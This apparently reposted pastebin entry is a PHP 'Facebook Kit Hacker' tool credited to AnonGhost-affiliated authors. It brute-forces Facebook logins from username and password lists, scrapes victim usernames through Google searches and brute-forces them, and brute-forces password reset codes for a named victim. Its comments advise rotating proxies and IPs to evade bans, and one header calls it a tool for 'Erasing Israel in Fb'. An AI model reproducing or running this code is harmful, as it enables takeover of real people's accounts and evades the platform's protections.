PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★


SUBMITTED BY: Guest

DATE: May 14, 2015, 3:55 p.m.

FORMAT: Text only

SIZE: 27.1 kB

HITS: 4313

  1. PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★
  2. <?php
  3. session_start();
  4. error_reporting(E_ERROR | E_PARSE);
  5. @ini_set("max_execution_time",0);
  6. @set_time_limit(0); #No Fx in SafeMode
  7. @ignore_user_abort(TRUE);
  8. @set_magic_quotes_runtime(0);
  9. // Use your mind to escape Facebook Security \!/
  10. // Don't Allow Cookies in your browser (Use priv8 browsing)
  11. // Change your IP and DNS each 2 seconds and your Job will be Great °_°
  12. // GreetZ To : All AnonGhost MemberZ \!/
  13. // You can edit this script but don't forget to mention the authors °_°
  14. // Tutorial Video: https://www.youtube.com/watch?v=66a_wOwOT48
  15. echo '
  16. <html>
  17. <title>Facebook Kit</title><link rel="shortcut icon" href="http://www14.0zz0.com/2014/06/04/21/396554394.png" type="image/x-icon" />
  18. <body style="background-color:black;">
  19. <style type="text/css">
  20. body {
  21. background:
  22. url("http://i.imgur.com/hg21xZ9.png") repeat ,
  23. url("http://www.albertpalacci.org/wp-content/uploads/2014/08/fb-relationships-full.png") no-repeat center top,top left,top right;
  24. background-color: #000000;
  25. }
  26. a{
  27. text-decoration:none;
  28. border:1px solid #12549c;
  29. border-radius:5px;
  30. background-color:black;
  31. color:white;
  32. font-family:Arial;
  33. font-size:17;
  34. box-shadow: 0px 0px 12px #21a0ed;
  35. }
  36. #r{
  37. border-bottom:1px solid #12549c;
  38. }
  39. </style>
  40. <head>
  41. </body>
  42. </html>
  43. <center><font color="white" face="Orbitron" size="7" align="center">Facebook Kit Hacker v 1.2</font></center>
  44. ';
  45. echo '<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29tL3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</center>';
  46. echo '<center><font color="#007700" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">';
  47. echo '</font></b></div><br></center>';
  48. ?>
  49. <div id="det" align="center">
  50. </div>
  51. </center>
  52. <div id="r" align="center">
  53. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']); ?>">&nbsp;Home&nbsp;</a></font>
  54. <a href="?action=baipas">&nbsp;FB Brute Force&nbsp;</a></font>
  55. <a href="?action=brut">&nbsp;FB Ghost Catcher&nbsp;</a></font>
  56. <a href="?action=crack">&nbsp;FB Reset Code&nbsp;</a></font>
  57. <a href="?action=passgen">&nbsp;Reset Code Generator&nbsp;</a></font>
  58. <a href="?action=idgen">&nbsp;FB ID Generator&nbsp;</a></font>
  59. <a href="?action=graph">&nbsp;FB ID Checker&nbsp;</a></font>
  60. <audio autoplay> <source src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sounds/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
  61. </div><br>
  62. <?php
  63. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
  64. @error_reporting(0);
  65. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  66. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  67. $validCharNumber = strlen($validCharacters);
  68. $len = 10;
  69. $result = "";
  70. for ($i = 0; $i < $len; $i++) {
  71. $index = mt_rand(0, $validCharNumber - 1);
  72. $result .= $validCharacters[$index];
  73. }
  74. return $result;
  75. }
  76. echo'
  77. <style>
  78. textarea {
  79. resize:none;
  80. color: #1975FF ;
  81. border:1px solid #1975FF ;
  82. border-left: 4px solid #1975FF ;
  83. }
  84. input {
  85. color: ##33CCFF;
  86. border:1px dotted #33CCFF;
  87. }
  88. </style>
  89. <p><center><font face="impact" color="White" size="4">Facebook ID Generator
  90. </center><center></font><br>
  91. <title>Facebook ID Generator</title>
  92. <form method="post">
  93. <font color="white">Number Of ID : <br><input type="text" name="nr"><br><br></font>
  94. <input type="submit" value="Generate" name="fbmailgen">
  95. </form><br>';
  96. $len = $_POST['len'];
  97. $nr = $_POST['nr'];
  98. if ($_POST['fbmailgen']) {
  99. echo"<textarea style='resize:none;' class='area' cols='45' rows='10'>";
  100. for ($x=0; $x < $nr ; $x++){
  101. echo "10000" . getRandomString() . "\r\n";
  102. }
  103. echo "</textarea><br>";
  104. echo "
  105. <br>
  106. <b>
  107. </b>
  108. <br>
  109. ";
  110. }
  111. }
  112. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
  113. @error_reporting(0);
  114. function getRandomString() { //Facebook Email Admin Page Default Lenght is 13 so don't change it xD wkwkwkkw !
  115. $validCharacters = "0123456789"; // Here you are free to choose how to randomize your words ^_^
  116. $validCharNumber = strlen($validCharacters);
  117. $len = 6;
  118. $result = "";
  119. for ($i = 0; $i < $len; $i++) {
  120. $index = mt_rand(0, $validCharNumber - 1);
  121. $result .= $validCharacters[$index];
  122. }
  123. return $result;
  124. }
  125. echo'
  126. <style>
  127. textarea {
  128. resize:none;
  129. color: #1975FF ;
  130. border:1px solid #1975FF ;
  131. border-left: 4px solid #1975FF ;
  132. }
  133. input {
  134. color: ##33CCFF;
  135. border:1px dotted #33CCFF;
  136. }
  137. </style>
  138. <p><center><font face="impact" color="White" size="4">Facebook Reset Code Generator</font>
  139. </center><center><br>
  140. <title>Facebook Reset Code Generator</title>
  141. <form method="post">
  142. <font color="white">Number Of Reset Codes : &nbsp;&nbsp;<input type="text" name="nr"><br><br></font>
  143. <input type="submit" value="Generate" name="fbmailgen">
  144. </form><br>';
  145. $len = $_POST['len'];
  146. $nr = $_POST['nr'];
  147. if ($_POST['fbmailgen']) {
  148. echo"<textarea style='resize:none;' class='area' cols='20' rows='10'>";
  149. for ($x=0; $x < $nr ; $x++){
  150. echo getRandomString() . "\r\n";
  151. }
  152. echo "</textarea><br>";
  153. echo "
  154. <br>
  155. <b>
  156. </b>
  157. <br>
  158. ";
  159. }
  160. }
  161. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
  162. echo"
  163. <style>
  164. textarea {
  165. resize:none;
  166. color: #1975FF ;
  167. border:1px solid #1975FF ;
  168. border-left: 4px solid #1975FF ;
  169. }
  170. input {
  171. color: ##33CCFF;
  172. border:1px dotted #33CCFF;
  173. }
  174. select {
  175. color: ##33CCFF;
  176. border:1px dotted #33CCFF;
  177. }
  178. </style>
  179. <title>F4c3b00k Gh0sT</title>
  180. <form method='POST'>
  181. <center><font face='impact' size='4' color='white'>Facebook Gh0sT Catcher by n0name-hax0r & Mauritania Attacker</font><br></center><br>
  182. <center>
  183. <center><font face='arial' size='1' color='red'>Server</font><br></center>
  184. <select name=country><br><br>
  185. <option value='Choose Country'>Choose The Country</option>
  186. <option value='site:fr-fr.facebook.com/'>France</option>
  187. <option value='site:ar-ar.facebook.com/'>Arab Countries</option>
  188. <option value='site:es-es.facebook.com/'>Spain</option>
  189. <option value='site:tr-tr.facebook.com/'>Turkey</option>
  190. <option value='site:de-de.facebook.com/'>Germany</option>
  191. <option value='site:pt-pt.facebook.com/'>Portugual</option>
  192. <option value='site:it-it.facebook.com/'>Italy</option>
  193. <option value='site:hi-in.facebook.com/'>India</option>
  194. <option value='site:sr-rs.facebook.com/'>Serbia</option>
  195. <option value='site:el-gr.facebook.com/'>Greece</option>
  196. <option value='site:he-il.facebook.com/'>Israel</option>
  197. <option value='site:id-id.facebook.com/'>Indonesia</option>
  198. <option value='site:ru-ru.facebook.com/'>Russia</option>
  199. <option value='site:nl-nl.facebook.com/'>Netherlands</option>
  200. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
  201. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
  202. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
  203. <option value='site:zh-cn.facebook.com/'>China</option>
  204. </select><br><br>
  205. </center>
  206. <center>
  207. <input type='text' name='victim' placeholder='Victim Name'><br><br>
  208. <textarea name='pass' style='resize:none;' rows='10' cols='20' placeholder='Password List'></textarea><br><br>
  209. <input type='submit' name='start' value='~~Start Catching~~'></center><br><br>
  210. </form>
  211. <center>
  212. <font color='white'>(Use this tool using proxy and change the proxy every 1-2 mins to avoid getting banned from google)</font><br><br>
  213. ";
  214. set_time_limit(0);
  215. ini_set('memory_limit', '64M');
  216. header('Content-Type: text/html; charset=UTF-8');
  217. function letItBy(){ ob_flush(); flush(); }
  218. $country = $_POST['country'];
  219. $victim = $_POST['victim'];
  220. $bing = "{$country}"."{$victim}";
  221. $password = explode("\r\n",$_POST['pass']);
  222. //Function that gets google urls
  223. function google_that($query, $page=1)
  224. {
  225. $resultPerPage=8;
  226. $start = $page*$resultPerPage;
  227. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  228. $resultFromGoogle = json_decode( http_get($url, true) ,true);
  229. if(isset($resultFromGoogle['responseStatus'])) {
  230. if($resultFromGoogle['responseStatus'] != '200') return false;
  231. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  232. else return $resultFromGoogle['responseData']['results'];
  233. }
  234. else
  235. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
  236. }
  237. function http_get($url, $safemode = false){
  238. if($safemode === true) sleep(1);
  239. $im = curl_init($url);
  240. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  241. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  242. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  243. curl_setopt($im, CURLOPT_HEADER, 0);
  244. return curl_exec($im);
  245. curl_close();
  246. }
  247. function brute($user,$pass){
  248. $ch = curl_init();
  249. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  250. curl_setopt($ch, CURLOPT_HEADER, 0);
  251. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  252. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  253. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  254. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  255. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  256. $login = curl_exec($ch);
  257. //print_r($login);
  258. $check = (eregi('class="s t i u"',$login)) ? true:false;
  259. if($check == true){
  260. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  261. }else{
  262. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  263. }
  264. }
  265. if(isset($_POST['start'])){
  266. letItBy();
  267. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
  268. $googleResult = google_that($bing, $googlePage);
  269. if(!$googleResult) {
  270. echo 'Finished scanning.';
  271. break;
  272. }
  273. // Gets the username of victim
  274. for($victim = 0; $victim < sizeof($googleResult); $victim++){
  275. $result = $googleResult[$victim]['unescapedUrl'];
  276. if($country == "site:fr-fr.facebook.com/"){
  277. $rsss = str_replace("https://fr-fr.facebook.com/","",$result);
  278. }
  279. elseif($country == "site:ar-ar.facebook.com/"){
  280. $rsss = str_replace("https://ar-ar.facebook.com/","",$result);
  281. }
  282. elseif($country == "site:es-es.facebook.com/"){
  283. $rsss = str_replace("https://es-es.facebook.com/","",$result);
  284. }
  285. elseif($country == "site:tr-tr.facebook.com/"){
  286. $rsss = str_replace("https://tr-tr.facebook.com/","",$result);
  287. }
  288. elseif($country == "site:de-de.facebook.com/"){
  289. $rsss = str_replace("https://de-de.facebook.com/","",$result);
  290. }
  291. elseif($country == "site:pt-pt.facebook.com/"){
  292. $rsss = str_replace("https://pt-pt.facebook.com/","",$result);
  293. }
  294. elseif($country == "site:it-it.facebook.com/"){
  295. $rsss = str_replace("https://it-it.facebook.com/","",$result);
  296. }
  297. elseif($country == "site:hi-in.facebook.com/"){
  298. $rsss = str_replace("https://hi-in.facebook.com/","",$result);
  299. }
  300. elseif($country == "site:zh-cn.facebook.com/"){
  301. $rsss = str_replace("https://zh-cn.facebook.com/","",$result);
  302. }
  303. elseif($country == "site:sr-rs.facebook.com/"){
  304. $rsss = str_replace("https://sr-rs.facebook.com/","",$result);
  305. }
  306. elseif($country == "site:el-gr.facebook.com/"){
  307. $rsss = str_replace("https://el-gr.facebook.com/","",$result);
  308. }
  309. elseif($country == "site:he-il.facebook.com/"){
  310. $rsss = str_replace("https://he-il.facebook.com/","",$result);
  311. }
  312. elseif($country == "site:id-id.facebook.com/"){
  313. $rsss = str_replace("https://id-id.facebook.com/","",$result);
  314. }
  315. elseif($country == "site:ru-ru.facebook.com/"){
  316. $rsss = str_replace("https://ru-ru.facebook.com/","",$result);
  317. }
  318. elseif($country == "site:nl-nl.facebook.com/"){
  319. $rsss = str_replace("https://nl-nl.facebook.com/","",$result);
  320. }
  321. elseif($country == "site:bg-bg.facebook.com/"){
  322. $rsss = str_replace("https://bg-bg.facebook.com/","",$result);
  323. }
  324. elseif($country == "site:mk-mk.facebook.com/"){
  325. $rsss = str_replace("https://mk-mk.facebook.com/","",$result);
  326. }
  327. elseif($country == "site:uk-ua.facebook.com/"){
  328. $rsss = str_replace("https://uk-ua.facebook.com/","",$result);
  329. }
  330. $users = explode("?", $rsss);
  331. $users = $users[0];
  332. //Bruteforce Function
  333. foreach($password as $pass)
  334. {
  335. echo brute($users,$pass);
  336. }
  337. }
  338. }
  339. }
  340. @system("del cookie.txt"); //Delete cookies command for win server.
  341. @system("rm cookie.txt"); // Delete cookies command for linux server.
  342. }
  343. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
  344. ob_start();
  345. @set_time_limit(0);
  346. #################################################
  347. #---------------------------------------------- #
  348. # Facebook Brute Force 2014 #
  349. #Coded by : Mauritania Attacker&Noname-Haxor #
  350. #Greetz : All AnonGhost Members #
  351. #This Tool Is For Erasing Israel in Fb #
  352. # --------------------------------------------- #
  353. #################################################
  354. echo "
  355. <head>
  356. <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
  357. <form method='POST'>
  358. <title>Facebook Brute Force 2014</title>
  359. </head>
  360. <style>
  361. textarea {
  362. resize:none;
  363. color: #1975FF ;
  364. border:1px solid #1975FF ;
  365. border-left: 4px solid #1975FF ;
  366. }
  367. input {
  368. color: ##33CCFF;
  369. border:1px dotted #33CCFF;
  370. }
  371. </style>";
  372. echo "
  373. <body text='#FFFFFF' >
  374. <center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
  375. <p dir='ltr' align='center'>
  376. <textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
  377. <textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
  378. <br>
  379. <input type='submit' name='scan' value='Start BruteForce'><br></p>";
  380. if(isset($_POST['scan'])){
  381. #To Put Proxy SOCKS V5
  382. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  383. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  384. function brute($user,$pass){
  385. $ch = curl_init();
  386. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
  387. curl_setopt($ch, CURLOPT_HEADER, 0);
  388. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  389. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  390. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  391. curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
  392. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
  393. $login = curl_exec($ch);
  394. //print_r($login);
  395. $check = (eregi('class="s t i u"',$login)) ? true:false;
  396. if($check == true){
  397. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font>&nbsp; Password : <font color='red'>$pass</font></font></p>";
  398. }else{
  399. echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
  400. }
  401. }
  402. $username = explode("\n", $_POST['username']);
  403. $password = explode("\n", $_POST['password']);
  404. foreach($username as $users) {
  405. $users = @trim($users);
  406. foreach($password as $pass) {
  407. $pass = @trim($pass);
  408. echo brute($users,$pass);
  409. }
  410. }
  411. @system("del cookie.txt"); //Delete cookies command for win server.
  412. @system("rm cookie.txt"); // Delete cookies command for linux server.
  413. }
  414. echo"<br>
  415. <br>
  416. <br>
  417. <br>
  418. ";
  419. }
  420. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
  421. /*
  422. [+] Facebook Code Security Cracker
  423. [+] Coded By : Mauritania Attacker
  424. [+] GreetZ : All AnonGhost MemberZ
  425. [+] FuCk Priv888888888888888888888
  426. ~~HACKING IS ART OF EXPLOITATION~~
  427. <3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
  428. // How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
  429. I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
  430. security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
  431. you still can add a proxy socks v5 option in Curl only two lines :
  432. curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
  433. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
  434. You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
  435. Sharing is Caring \!/
  436. Sorry my english is bad and i'm lazy xD !
  437. */
  438. @set_time_limit(0);
  439. echo "<form method='POST'>
  440. <title>Facebook Code Security Cracker > By Mauritania Attacker</title>
  441. <style>
  442. /* Rounded Corners */
  443. #ghost {
  444. resize:none;
  445. color: #1975FF ;
  446. border:1px solid #1975FF ;
  447. border-left: 4px solid #1975FF ;
  448. height: 250px;
  449. width: 200px; }
  450. input {
  451. /* INPUTS */
  452. border: 1px solid #12549c;
  453. }
  454. </style>
  455. <center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
  456. <center><input type='text' name='target' placeholder='Victim'></center><br>
  457. <center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
  458. <p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
  459. </form>";
  460. $target=$_POST['target'];
  461. $user = explode("\r\n", $_POST['code']);
  462. if($_POST['scan'])
  463. {
  464. foreach($user as $code)
  465. {
  466. // Curl Function ^_^
  467. $ch = curl_init();
  468. curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
  469. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  470. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  471. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  472. curl_setopt($ch, CURLOPT_HEADER, 1);
  473. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
  474. $check = curl_exec($ch);
  475. if(eregi("password_new", $check)) //Keyword Good Response ^_^
  476. {
  477. echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
  478. }
  479. else
  480. {
  481. echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
  482. }
  483. curl_close($ch);
  484. }
  485. }
  486. @system("del cookie.txt"); //Delete cookies command for win server.
  487. @system("rm cookie.txt"); // Delete cookies command for linux server.
  488. }
  489. echo "</center><center>";
  490. ob_end_flush();
  491. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
  492. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
  493. @set_time_limit(0);
  494. echo "<form method='POST'>
  495. <title>Facebook ID's Checker By Mauritania Attacker</title>
  496. <style>
  497. /* Rounded Corners */
  498. #ghost {
  499. resize:none;
  500. color: #1975FF ;
  501. border:1px solid #1975FF ;
  502. border-left: 4px solid #1975FF ;
  503. height: 250px;
  504. width: 200px; }
  505. input {
  506. /* INPUTS */
  507. border: 1px solid #12549c;
  508. }
  509. </style>
  510. <center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
  511. <center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
  512. <p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
  513. </form>";
  514. $user = explode("\r\n", $_POST['code']);
  515. if($_POST['scan'])
  516. {
  517. foreach($user as $code)
  518. {
  519. // Curl Function ^_^
  520. $ch = curl_init();
  521. curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
  522. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  523. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  524. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  525. curl_setopt($ch, CURLOPT_HEADER, 1);
  526. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
  527. $check = curl_exec($ch);
  528. if(eregi("username", $check)) //Keyword Good Response ^_^
  529. {
  530. echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
  531. }
  532. else
  533. {
  534. echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
  535. }
  536. curl_close($ch);
  537. }
  538. }
  539. @system("del cookie.txt"); //Delete cookies command for win server.
  540. @system("rm cookie.txt"); // Delete cookies command for linux server.
  541. }
  542. echo "</center><center>";
  543. ob_end_flush();
  544. echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
  545. ?>

comments powered by Disqus